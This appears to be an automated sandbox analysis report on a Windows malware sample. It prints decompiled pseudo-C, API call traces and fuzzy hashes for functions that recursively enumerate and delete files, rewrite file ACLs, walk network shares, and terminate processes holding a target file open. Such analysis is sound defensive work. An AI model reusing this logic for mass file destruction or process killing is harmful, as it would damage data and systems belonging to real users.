                                                                                          • Part of subcall function 00401A3A: wcslen.NTDLL ref: 00401A49
                                                                                        • wcscat.NTDLL ref: 00404117
                                                                                        • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00404132
                                                                                        • wcslen.NTDLL ref: 00404161
                                                                                        • wcslen.NTDLL ref: 0040416F
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 0040418A
                                                                                        • wcscpy.NTDLL ref: 004041A3
                                                                                        • wcsrchr.NTDLL ref: 004041B1
                                                                                        • wcscpy.NTDLL ref: 004041C2
                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 004041CE
                                                                                        • RemoveDirectoryW.KERNEL32(00000000,00000000), ref: 004041F2
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00404203
                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00404215
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00404226
                                                                                          • Part of subcall function 00401B91: wcslen.NTDLL ref: 00401BBA
                                                                                          • Part of subcall function 00401B91: RtlAllocateHeap.NTDLL(00000008,00000000,?), ref: 00401BD3
                                                                                          • Part of subcall function 00401B91: wcscpy.NTDLL ref: 00401BEC
                                                                                          • Part of subcall function 00401B91: wcscat.NTDLL ref: 00401C0B
                                                                                          • Part of subcall function 00401B91: FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00401C26
                                                                                          • Part of subcall function 00401B91: FindClose.KERNEL32(000000FF), ref: 00401C68
                                                                                          • Part of subcall function 00401B91: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401C7F
                                                                                        • FindNextFileW.KERNEL32(000000FF,?), ref: 0040423D
                                                                                        • FindClose.KERNEL32(000000FF), ref: 0040424E
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00404265
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040427C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$FileFindFreewcslen$wcscpy$Allocate$CloseFirstwcscat$AttributesDeleteDirectoryNextRemovewcsrchr
                                                                                        • String ID: *
                                                                                        • API String ID: 3491126630-163128923
                                                                                        • Opcode ID: 5e81489fd4901c3b4ff25ce478bfa37c0ad1991712d7b8a2e1fb93892d34b3da
                                                                                        • Instruction ID: 1492c8db7d695e76714a3bd2c79d4e5b7cd140cbf661b2fc1bb93d2064f1f6ca
                                                                                        • Opcode Fuzzy Hash: 5e81489fd4901c3b4ff25ce478bfa37c0ad1991712d7b8a2e1fb93892d34b3da
                                                                                        • Instruction Fuzzy Hash: 02514570900218FFDB219FA0ED09BAEBB75FB44302F404579FA11B11B0DB761A69DB49
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 88%
                                                                                        			E00407784() {
                                                                                        				long _v8;
                                                                                        				intOrPtr _v12;
                                                                                        				wchar_t** _v16;
                                                                                        				void* _v20;
                                                                                        				char _v24;
                                                                                        				char _v28;
                                                                                        				long _v32;
                                                                                        				char _v36;
                                                                                        				void* _v40;
                                                                                        				HANDLE* _v44;
                                                                                        				void* _v48;
                                                                                        				intOrPtr _v52;
                                                                                        				short _v572;
                                                                                        				intOrPtr _t94;
                                                                                        				char _t97;
                                                                                        				void* _t104;
                                                                                        				void* _t105;
                                                                                        				int _t109;
                                                                                        				int _t110;
                                                                                        				void* _t119;
                                                                                        				void* _t120;
                                                                                        				signed int _t123;
                                                                                        				wchar_t** _t124;
                                                                                        				long _t125;
                                                                                        				void* _t134;
                                                                                        				void* _t137;
                                                                                        				void* _t138;
                                                                                        				void* _t139;
                                                                                        				void* _t144;
                                                                                        
                                                                                        				_v48 = RtlAllocateHeap( *0x40f5d6, 8, 0x1000);
                                                                                        				if(_v48 != 0) {
                                                                                        					_v52 = E00407380(_v48);
                                                                                        					if(_v52 != 0) {
                                                                                        						if( *0x40f5e6 == 0) {
                                                                                        							if( *0x40f5ea == 0) {
                                                                                        								_t94 = 0;
                                                                                        							} else {
                                                                                        								_t94 =  *0x40f5ea; // 0x0
                                                                                        							}
                                                                                        						} else {
                                                                                        							_t94 =  *0x40f5e6; // 0x0
                                                                                        						}
                                                                                        						_v12 = _t94;
                                                                                        						if(GetModuleFileNameW(0,  &_v572, 0x104) != 0) {
                                                                                        							_t97 = E00406BF9();
                                                                                        							_v36 = _t97;
                                                                                        							_v8 = 0;
                                                                                        							_t139 = _v48;
                                                                                        							do {
                                                                                        								asm("lodsd");
                                                                                        								_v20 = _t97;
                                                                                        								_v40 = 0;
                                                                                        								_v44 = 0;
                                                                                        								_v32 = 0;
                                                                                        								_t97 = E004072E0(_v20, 1,  &_v16, 0xffffffff,  &_v24,  &_v28,  &_v32, 0x64);
                                                                                        								if(_t97 != 0) {
                                                                                        									goto L48;
                                                                                        								}
                                                                                        								_t123 = _v36;
                                                                                        								_t97 = RtlAllocateHeap( *0x40f5d6, 8, _t123 * 4);
                                                                                        								_v44 = _t97;
                                                                                        								if(_v44 != 0) {
                                                                                        									if( *0x40f5a5 == 0) {
                                                                                        										_v40 = 0;
                                                                                        										L20:
                                                                                        										_t124 = _v16;
                                                                                        										do {
                                                                                        											if(_t124[1] == 0) {
                                                                                        												L26:
                                                                                        												_t97 = E00407153(_v12, _v20,  *_t124);
                                                                                        												if(_t97 == 0) {
                                                                                        													goto L38;
                                                                                        												}
                                                                                        												_t109 = wcslen(_v20 + 4);
                                                                                        												_t110 = wcslen( *_t124);
                                                                                        												_t144 = _t144 + 8;
                                                                                        												_t97 = RtlAllocateHeap( *0x40f5d6, 8, 0xe + (_t109 + _t110) * 2);
                                                                                        												_t137 = _t97;
                                                                                        												if(_t137 == 0) {
                                                                                        													goto L38;
                                                                                        												}
                                                                                        												 *_t137 = 0x4e0055;
                                                                                        												 *((intOrPtr*)(_t137 + 4)) = 0x5c0043;
                                                                                        												wcscat(_t137, _v20 + 4);
                                                                                        												wcscat(_t137,  *_t124);
                                                                                        												_t144 = _t144 + 0x10;
                                                                                        												E00406C06(_v12,  &_v572, _t137, _v8, _v44, _v40);
                                                                                        												RtlFreeHeap( *0x40f5d6, 0, _t137);
                                                                                        												_v8 = _v8 + 1;
                                                                                        												_t97 = _v36;
                                                                                        												if(_v8 != _t97) {
                                                                                        													goto L38;
                                                                                        												}
                                                                                        												_t119 = WaitForMultipleObjects(_v8, _v44, 1, 0xffffffff);
                                                                                        												_push(_t139);
                                                                                        												if(_v40 == 0) {
                                                                                        													L35:
                                                                                        													do {
                                                                                        														asm("lodsd");
                                                                                        														_t119 = NtClose(_t119);
                                                                                        														_v8 = _v8 - 1;
                                                                                        													} while (_v8 != 0);
                                                                                        													_pop(_t139);
                                                                                        													goto L38;
                                                                                        												}
                                                                                        												_push(_v8);
                                                                                        												do {
                                                                                        													asm("lodsd");
                                                                                        													_t138 = _t119;
                                                                                        													_t120 = MapViewOfFile(_t138, 0xf001f, 0, 0, 0x10);
                                                                                        													if(_t120 != 0) {
                                                                                        														 *0x40f638 =  *0x40f638 +  *_t120;
                                                                                        														 *0x40f644 =  *0x40f644 +  *((intOrPtr*)(_t120 + 4));
                                                                                        														 *0x40f63c =  *0x40f63c +  *((intOrPtr*)(_t120 + 8));
                                                                                        														asm("adc [0x40f640], ecx");
                                                                                        														UnmapViewOfFile(_t120);
                                                                                        													}
                                                                                        													_t119 = NtClose(_t138);
                                                                                        													_v8 = _v8 - 1;
                                                                                        												} while (_v8 != 0);
                                                                                        												_pop( *_t60);
                                                                                        												goto L35;
                                                                                        											}
                                                                                        											if(_t124[1] != 0x80000000) {
                                                                                        												L25:
                                                                                        												goto L38;
                                                                                        											}
                                                                                        											_t97 = E00407236( *_t124);
                                                                                        											if(_t97 != 0) {
                                                                                        												goto L25;
                                                                                        											}
                                                                                        											goto L26;
                                                                                        											L38:
                                                                                        											_t124 =  &(_t124[3]);
                                                                                        											_v24 = _v24 - 1;
                                                                                        										} while (_v24 != 0);
                                                                                        										if(_v8 == 0) {
                                                                                        											goto L48;
                                                                                        										}
                                                                                        										_t104 = WaitForMultipleObjects(_v8, _v44, 1, 0xffffffff);
                                                                                        										_push(_t139);
                                                                                        										if(_v40 == 0) {
                                                                                        											L45:
                                                                                        											do {
                                                                                        												asm("lodsd");
                                                                                        												_t104 = NtClose(_t104);
                                                                                        												_v8 = _v8 - 1;
                                                                                        											} while (_v8 != 0);
                                                                                        											_pop(_t139);
                                                                                        											goto L48;
                                                                                        										}
                                                                                        										_t125 = _v8;
                                                                                        										do {
                                                                                        											asm("lodsd");
                                                                                        											_t134 = _t104;
                                                                                        											_t105 = MapViewOfFile(_t134, 0xf001f, 0, 0, 0x10);
                                                                                        											if(_t105 != 0) {
                                                                                        												 *0x40f638 =  *0x40f638 +  *_t105;
                                                                                        												 *0x40f644 =  *0x40f644 +  *((intOrPtr*)(_t105 + 4));
                                                                                        												 *0x40f63c =  *0x40f63c +  *((intOrPtr*)(_t105 + 8));
                                                                                        												asm("adc [0x40f640], ecx");
                                                                                        												UnmapViewOfFile(_t105);
                                                                                        											}
                                                                                        											_t104 = NtClose(_t134);
                                                                                        											_t125 = _t125 - 1;
                                                                                        										} while (_t125 != 0);
                                                                                        										goto L45;
                                                                                        									}
                                                                                        									_t97 = RtlAllocateHeap( *0x40f5d6, 8, _t123 * 4);
                                                                                        									_v40 = _t97;
                                                                                        									if(_v40 != 0) {
                                                                                        										goto L20;
                                                                                        									}
                                                                                        									goto L55;
                                                                                        								}
                                                                                        								goto L55;
                                                                                        								L48:
                                                                                        								if(_v20 != 0) {
                                                                                        									_t97 = RtlFreeHeap( *0x40f5d6, 0, _v20);
                                                                                        								}
                                                                                        								if(_v44 != 0) {
                                                                                        									_t97 = RtlFreeHeap( *0x40f5d6, 0, _v44);
                                                                                        								}
                                                                                        								if(_v40 != 0) {
                                                                                        									_t97 = RtlFreeHeap( *0x40f5d6, 0, _v40);
                                                                                        								}
                                                                                        								_v52 = _v52 - 1;
                                                                                        							} while (_v52 != 0);
                                                                                        							goto L55;
                                                                                        						} else {
                                                                                        							L55:
                                                                                        							if(_v48 == 0) {
                                                                                        								return _t97;
                                                                                        							}
                                                                                        							return RtlFreeHeap( *0x40f5d6, 0, _v48);
                                                                                        						}
                                                                                        					}
                                                                                        					goto L55;
                                                                                        				}
                                                                                        				goto L55;
                                                                                        			}

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00001000), ref: 0040779F
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 00407B18
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFree
                                                                                        • String ID:
                                                                                        • API String ID: 2488874121-0
                                                                                        • Opcode ID: d21f918a2e1e0284cbbdd58ae77193405c80fe2d38715db99d9f2e5c05684a7b
                                                                                        • Instruction ID: e27386cccb6b0d59a5aa9b3d59438d4793f7219406efa69682022a7a7f05bdd0
                                                                                        • Opcode Fuzzy Hash: d21f918a2e1e0284cbbdd58ae77193405c80fe2d38715db99d9f2e5c05684a7b
                                                                                        • Instruction Fuzzy Hash: 53B15831D04208EFDB21DF94DE48BAEBBB5FB08315F10403AE501B62A1D7796949DF1A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 89%
                                                                                        			E004056D4(WCHAR* _a4) {
                                                                                        				long _v8;
                                                                                        				long _v12;
                                                                                        				intOrPtr _v16;
                                                                                        				void* _v20;
                                                                                        				void* _v24;
                                                                                        				WCHAR* _v28;
                                                                                        				void* _v32;
                                                                                        				void* _v36;
                                                                                        				void* _v40;
                                                                                        				long _v44;
                                                                                        				long _v48;
                                                                                        				void* _v52;
                                                                                        				void* _v76;
                                                                                        				WCHAR* _t72;
                                                                                        				long _t77;
                                                                                        				void* _t81;
                                                                                        				long _t82;
                                                                                        				intOrPtr* _t87;
                                                                                        				WCHAR* _t101;
                                                                                        				void* _t102;
                                                                                        				WCHAR* _t117;
                                                                                        				void* _t118;
                                                                                        				intOrPtr _t119;
                                                                                        				void* _t120;
                                                                                        				long* _t121;
                                                                                        				void* _t122;
                                                                                        				void* _t123;
                                                                                        
                                                                                        				_v8 = 0;
                                                                                        				_v32 = 0;
                                                                                        				_v36 = 0;
                                                                                        				_v40 = 0;
                                                                                        				_v16 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                                                                        				_t117 = _a4;
                                                                                        				_t72 = PathFindFileNameW(_t117);
                                                                                        				if(_t72 == _t117) {
                                                                                        					L34:
                                                                                        					return _v8;
                                                                                        				} else {
                                                                                        					_v28 = _t72;
                                                                                        					_t118 = E00405564();
                                                                                        					_v44 = 0x400;
                                                                                        					_v40 = RtlAllocateHeap( *0x40f5d6, 0, _v44);
                                                                                        					while(1) {
                                                                                        						_t77 = NtQuerySystemInformation(0x10, _v40, _v44,  &_v44);
                                                                                        						if(_t77 == 0) {
                                                                                        							break;
                                                                                        						}
                                                                                        						if(_t77 != 0xc0000004) {
                                                                                        							RtlFreeHeap( *0x40f5d6, 0, _v40);
                                                                                        							return _v8;
                                                                                        						} else {
                                                                                        							_v40 = RtlReAllocateHeap( *0x40f5d6, 0, _v40, _v44);
                                                                                        							continue;
                                                                                        						}
                                                                                        						goto L35;
                                                                                        					}
                                                                                        					_t81 = RtlAllocateHeap( *0x40f5d6, 8, 0x10000);
                                                                                        					_v32 = _t81;
                                                                                        					_t121 = _v40;
                                                                                        					asm("lodsd");
                                                                                        					_t120 = _t81;
                                                                                        					_v12 = 0;
                                                                                        					do {
                                                                                        						_t119 = _v16;
                                                                                        						_t82 = _v12;
                                                                                        						if(_t121[1] != _t118 ||  *_t121 <= 4 ||  *_t121 == _t82 ||  *_t121 == _t119) {
                                                                                        							goto L27;
                                                                                        						} else {
                                                                                        							_v20 = 0;
                                                                                        							_v52 =  *_t121;
                                                                                        							_v48 = 0;
                                                                                        							_t87 =  &_v76;
                                                                                        							 *_t87 = 0x18;
                                                                                        							 *(_t87 + 4) = 0;
                                                                                        							 *(_t87 + 8) = 0;
                                                                                        							 *(_t87 + 0xc) = 0;
                                                                                        							 *(_t87 + 0x10) = 0;
                                                                                        							 *(_t87 + 0x14) = 0;
                                                                                        							if(NtOpenProcess( &_v20, 0x100441,  &_v76,  &_v52) == 0) {
                                                                                        								if(NtDuplicateObject(_v20, _t121[1] & 0x0000ffff, 0xffffffff,  &_v24, 0, 0, 2) == 0) {
                                                                                        									if(E004054E0(_v24, _v32) != 0) {
                                                                                        										memset(_v32, 0, 0x10000);
                                                                                        										_t122 = _t122 + 0xc;
                                                                                        										goto L25;
                                                                                        									} else {
                                                                                        										_t101 = PathFindFileNameW(_v32 + 4);
                                                                                        										_t102 =  *0x40f694(_t101, _v28);
                                                                                        										_t123 = _t122 + 8;
                                                                                        										if(_t102 != 0) {
                                                                                        											memset(_v32, 0, 0x10000);
                                                                                        											_t122 = _t123 + 0xc;
                                                                                        											L25:
                                                                                        											NtClose(_v24);
                                                                                        											goto L26;
                                                                                        										} else {
                                                                                        											_v36 = RtlAllocateHeap( *0x40f5d6, 8, 0x10000);
                                                                                        											if(NtQueryInformationProcess(_v20, 0x1b, _v36, 0x10000,  &_v44) == 0) {
                                                                                        												if(E0040567D(PathFindFileNameW( *(_v36 + 4))) == 0) {
                                                                                        													 *0x40f708(_v20, 0);
                                                                                        													WaitForSingleObject(_v20, 0xffffffff);
                                                                                        													_v8 = 1;
                                                                                        												}
                                                                                        												NtClose(_v24);
                                                                                        												NtClose(_v20);
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								} else {
                                                                                        									_v12 =  *_t121;
                                                                                        									L26:
                                                                                        									NtClose(_v20);
                                                                                        									goto L27;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_v12 =  *_t121;
                                                                                        								goto L27;
                                                                                        							}
                                                                                        						}
                                                                                        						break;
                                                                                        						L27:
                                                                                        						_t121 =  &(_t121[4]);
                                                                                        						_t120 = _t120 - 1;
                                                                                        					} while (_t120 != 0);
                                                                                        					if(_v40 != 0) {
                                                                                        						RtlFreeHeap( *0x40f5d6, 0, _v40);
                                                                                        					}
                                                                                        					if(_v32 != 0) {
                                                                                        						RtlFreeHeap( *0x40f5d6, 0, _v32);
                                                                                        					}
                                                                                        					if(_v36 != 0) {
                                                                                        						RtlFreeHeap( *0x40f5d6, 0, _v36);
                                                                                        					}
                                                                                        					goto L34;
                                                                                        				}
                                                                                        				L35:
                                                                                        			}
                                                                                        0x004056df
                                                                                        0x004056e6
                                                                                        0x004056ed
                                                                                        0x004056f4
                                                                                        0x00405704
                                                                                        0x00405707
                                                                                        0x0040570b
                                                                                        0x00405713
                                                                                        0x004059a9
                                                                                        0x004059b4
                                                                                        0x00405719
                                                                                        0x00405719
                                                                                        0x00405721
                                                                                        0x00405723
                                                                                        0x0040573b
                                                                                        0x0040573e
                                                                                        0x0040574a
                                                                                        0x00405752
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040575d
                                                                                        0x00405785
                                                                                        0x00405796
                                                                                        0x0040575f
                                                                                        0x00405773
                                                                                        0x00000000
                                                                                        0x00405773
                                                                                        0x00000000
                                                                                        0x0040575d
                                                                                        0x004057a8
                                                                                        0x004057ae
                                                                                        0x004057b1
                                                                                        0x004057b4
                                                                                        0x004057b5
                                                                                        0x004057b7
                                                                                        0x004057be
                                                                                        0x004057be
                                                                                        0x004057c1
                                                                                        0x004057c7
                                                                                        0x00000000
                                                                                        0x004057e6
                                                                                        0x004057e6
                                                                                        0x004057ef
                                                                                        0x004057f2
                                                                                        0x004057f9
                                                                                        0x004057fc
                                                                                        0x00405802
                                                                                        0x00405809
                                                                                        0x00405810
                                                                                        0x00405817
                                                                                        0x0040581e
                                                                                        0x0040583e
                                                                                        0x00405866
                                                                                        0x0040587f
                                                                                        0x0040593d
                                                                                        0x00405943
                                                                                        0x00000000
                                                                                        0x00405885
                                                                                        0x0040588c
                                                                                        0x00405896
                                                                                        0x0040589c
                                                                                        0x004058a1
                                                                                        0x00405928
                                                                                        0x0040592e
                                                                                        0x00405946
                                                                                        0x00405949
                                                                                        0x00000000
                                                                                        0x004058a3
                                                                                        0x004058b6
                                                                                        0x004058d2
                                                                                        0x004058eb
                                                                                        0x004058f2
                                                                                        0x004058fd
                                                                                        0x00405903
                                                                                        0x00405903
                                                                                        0x0040590d
                                                                                        0x00405916
                                                                                        0x00405916
                                                                                        0x0040591c
                                                                                        0x004058a1
                                                                                        0x00405868
                                                                                        0x0040586a
                                                                                        0x0040594f
                                                                                        0x00405952
                                                                                        0x00000000
                                                                                        0x00405952
                                                                                        0x00405840
                                                                                        0x00405842
                                                                                        0x00000000
                                                                                        0x00405842
                                                                                        0x0040583e
                                                                                        0x00000000
                                                                                        0x00405958
                                                                                        0x00405958
                                                                                        0x0040595b
                                                                                        0x0040595c
                                                                                        0x00405968
                                                                                        0x00405975
                                                                                        0x00405975
                                                                                        0x0040597f
                                                                                        0x0040598c
                                                                                        0x0040598c
                                                                                        0x00405996
                                                                                        0x004059a3
                                                                                        0x004059a3
                                                                                        0x00000000
                                                                                        0x00405996
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • PathFindFileNameW.SHLWAPI(?,00000000,?,?,?,?), ref: 0040570B
                                                                                          • Part of subcall function 00405564: RtlAllocateHeap.NTDLL(00000000,00000400,00000000), ref: 00405588
                                                                                          • Part of subcall function 00405564: NtQueryObject.NTDLL(00000000,00000003,?,00000400,00000400), ref: 0040559F
                                                                                          • Part of subcall function 00405564: _wcsicmp.NTDLL ref: 00405613
                                                                                          • Part of subcall function 00405564: RtlFreeHeap.NTDLL(00000000,?), ref: 0040566B
                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 00405735
                                                                                        • NtQuerySystemInformation.NTDLL(00000010,00000000,00000400,00000400), ref: 0040574A
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,00000000,00000400), ref: 0040576D
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00010000), ref: 004057A8
                                                                                        • NtOpenProcess.NTDLL(00000000,00100441,?,?), ref: 00405836
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00405975
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040598C
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004059A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFree$Query$FileFindInformationNameObjectOpenPathProcessSystem_wcsicmp
                                                                                        • String ID:
                                                                                        • API String ID: 780744661-0
                                                                                        • Opcode ID: b52b44ac54c2e9d9a8cec1c80db52c9f8485237dd8de7a5e49fd5336b9c97d7d
                                                                                        • Instruction ID: c0de1c5d6ea3ba0be0971763f5dab08ae73666abd404ef5d77822f984a4be386
                                                                                        • Opcode Fuzzy Hash: b52b44ac54c2e9d9a8cec1c80db52c9f8485237dd8de7a5e49fd5336b9c97d7d
                                                                                        • Instruction Fuzzy Hash: 23813571900209EFDF219FA4DD49BAEBBB4FB08311F204436F601B62A0D77A9959DF58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 98%
                                                                                        			E004066AC(WCHAR* _a4, long _a8) {
                                                                                        				void* _v8;
                                                                                        				long _v12;
                                                                                        				wchar_t* _v16;
                                                                                        				void* _v20;
                                                                                        				struct _WIN32_FIND_DATAW _v612;
                                                                                        				int _t66;
                                                                                        				void* _t77;
                                                                                        				wchar_t* _t82;
                                                                                        				int _t86;
                                                                                        				int _t87;
                                                                                        				wchar_t* _t99;
                                                                                        				void* _t103;
                                                                                        				void* _t104;
                                                                                        				void* _t105;
                                                                                        
                                                                                        				_v16 = 0;
                                                                                        				_v20 = 0;
                                                                                        				_t66 = wcslen(_a4);
                                                                                        				_t104 = _t103 + 4;
                                                                                        				if(_t66 == 0) {
                                                                                        					L49:
                                                                                        					return _t66;
                                                                                        				}
                                                                                        				_t66 = RtlAllocateHeap( *0x40f5d6, 8, 6 + _t66 * 2);
                                                                                        				_v16 = _t66;
                                                                                        				if(_v16 == 0) {
                                                                                        					L45:
                                                                                        					if(_v16 != 0) {
                                                                                        						_t66 = RtlFreeHeap( *0x40f5d6, 0, _v16);
                                                                                        					}
                                                                                        					if(_v20 == 0) {
                                                                                        						goto L49;
                                                                                        					} else {
                                                                                        						return RtlFreeHeap( *0x40f5d6, 0, _v20);
                                                                                        					}
                                                                                        				} else {
                                                                                        					wcscpy(_v16, _a4);
                                                                                        					_t105 = _t104 + 8;
                                                                                        					E00405DC0(_v16);
                                                                                        					if( *0x40f5a1 != 0) {
                                                                                        						E004063FB(_v16,  *0x40f5d2);
                                                                                        					}
                                                                                        					if((GetFileAttributesW(_v16) & 0x00000010) != 0) {
                                                                                        						E00401A3A(_v16);
                                                                                        						_v12 = 0x2a;
                                                                                        						wcscat(_v16,  &_v12);
                                                                                        						_t105 = _t105 + 8;
                                                                                        					}
                                                                                        					_t66 = FindFirstFileExW(_v16, 0,  &_v612, 0, 0, _a8);
                                                                                        					_v8 = _t66;
                                                                                        					if(_v8 == 0xffffffff) {
                                                                                        						goto L45;
                                                                                        					} else {
                                                                                        						goto L7;
                                                                                        					}
                                                                                        					do {
                                                                                        						L7:
                                                                                        						_t99 =  &(_v612.cFileName);
                                                                                        						if( *_t99 != 0x2e &&  *_t99 != 0x2e002e) {
                                                                                        							if((_v612.dwFileAttributes & 0x00000010) == 0) {
                                                                                        								if((GetFileAttributesW(_a4) & 0x00000010) != 0) {
                                                                                        									if( *0x40f59a == 0 || E004065EA(_t99) == 0) {
                                                                                        										if( *0x40f59b == 0 || E00406577(_t99) == 0) {
                                                                                        											if( *0x40f5a1 == 0 || E0040625C(_v612.nFileSizeLow, _v612.nFileSizeHigh, _t99, _a4) == 0) {
                                                                                        												_t77 = E00405E35(_t99, _v612.nFileSizeLow, _v612.nFileSizeHigh, _a4);
                                                                                        												L37:
                                                                                        												if( *0x40f5a5 != 0) {
                                                                                        													if(_t77 == 0) {
                                                                                        														 *0x40f644 =  *0x40f644 + 1;
                                                                                        													} else {
                                                                                        														 *0x40f638 =  *0x40f638 + 1;
                                                                                        														 *0x40f63c =  *0x40f63c + _v612.nFileSizeLow;
                                                                                        														asm("adc [0x40f640], edx");
                                                                                        													}
                                                                                        												}
                                                                                        											} else {
                                                                                        											}
                                                                                        										} else {
                                                                                        										}
                                                                                        									} else {
                                                                                        									}
                                                                                        									goto L41;
                                                                                        								}
                                                                                        								_t82 = wcsstr(_v16, _t99);
                                                                                        								_t105 = _t105 + 8;
                                                                                        								 *_t82 = 0;
                                                                                        								if( *0x40f59a == 0 || E004065EA(_t99) == 0) {
                                                                                        									if( *0x40f59b == 0 || E00406577(_t99) == 0) {
                                                                                        										if( *0x40f5a1 == 0 || E0040625C(_v612.nFileSizeLow, _v612.nFileSizeHigh, _t99, _v16) == 0) {
                                                                                        											_t77 = E00405E35(_t99, _v612.nFileSizeLow, _v612.nFileSizeHigh, _v16);
                                                                                        											goto L37;
                                                                                        										} else {
                                                                                        											goto L41;
                                                                                        										}
                                                                                        									} else {
                                                                                        										goto L41;
                                                                                        									}
                                                                                        								} else {
                                                                                        									goto L41;
                                                                                        								}
                                                                                        							}
                                                                                        							if( *0x40f599 == 0 || E0040664B(_t99) == 0) {
                                                                                        								_t86 = wcslen(_t99);
                                                                                        								_t87 = wcslen(_v16);
                                                                                        								_t105 = _t105 + 8;
                                                                                        								_v20 = RtlAllocateHeap( *0x40f5d6, 8, 2 + (_t86 + _t87) * 2);
                                                                                        								if(_v20 != 0) {
                                                                                        									wcscpy(_v20, _v16);
                                                                                        									 *(wcsrchr(_v20, 0x2a)) = 0;
                                                                                        									wcscat(_v20, _t99);
                                                                                        									_t105 = _t105 + 0x18;
                                                                                        									E004066AC(_v20, _a8);
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						L41:
                                                                                        					} while (FindNextFileW(_v8,  &_v612) != 0);
                                                                                        					_t66 = FindClose(_v8);
                                                                                        					if( *0x40f59c != 0) {
                                                                                        						_t66 = E004064CC(_v16);
                                                                                        						if(_t66 != 0) {
                                                                                        							_t66 = E00406549(_v16);
                                                                                        						}
                                                                                        					}
                                                                                        					goto L45;
                                                                                        				}
                                                                                        			}

                                                                                        APIs
                                                                                        • wcslen.NTDLL ref: 004066CB
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000003), ref: 004066EC
                                                                                        • wcscpy.NTDLL ref: 00406705
                                                                                          • Part of subcall function 00405DC0: GetNamedSecurityInfoW.ADVAPI32(00406716,00000001,00000004,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000003), ref: 00405DDE
                                                                                          • Part of subcall function 00405DC0: SetEntriesInAclW.ADVAPI32(00000001,00405D91,00000000,00406716,?,?,?,00000003), ref: 00405DF6
                                                                                          • Part of subcall function 00405DC0: SetNamedSecurityInfoW.ADVAPI32(00406716,00000001,00000005,00405D85,00000000,00406716,00000000,?,?,?,00000003), ref: 00405E13
                                                                                          • Part of subcall function 00405DC0: RtlFreeHeap.NTDLL(00000000,00406716), ref: 00405E24
                                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000), ref: 00406730
                                                                                        • wcscat.NTDLL ref: 00406753
                                                                                        • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0040676F
                                                                                        • wcslen.NTDLL ref: 004067C6
                                                                                        • wcslen.NTDLL ref: 004067D4
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 004067EF
                                                                                        • wcscpy.NTDLL ref: 00406804
                                                                                        • wcsrchr.NTDLL ref: 00406812
                                                                                        • wcscat.NTDLL ref: 00406824
                                                                                          • Part of subcall function 004066AC: GetFileAttributesW.KERNEL32(?), ref: 00406840
                                                                                          • Part of subcall function 004066AC: wcsstr.NTDLL ref: 00406855
                                                                                          • Part of subcall function 00406577: PathFindExtensionW.SHLWAPI(004068F8,?,?,?,?,?), ref: 0040659B
                                                                                          • Part of subcall function 00406577: _wcsicmp.NTDLL ref: 004065AE
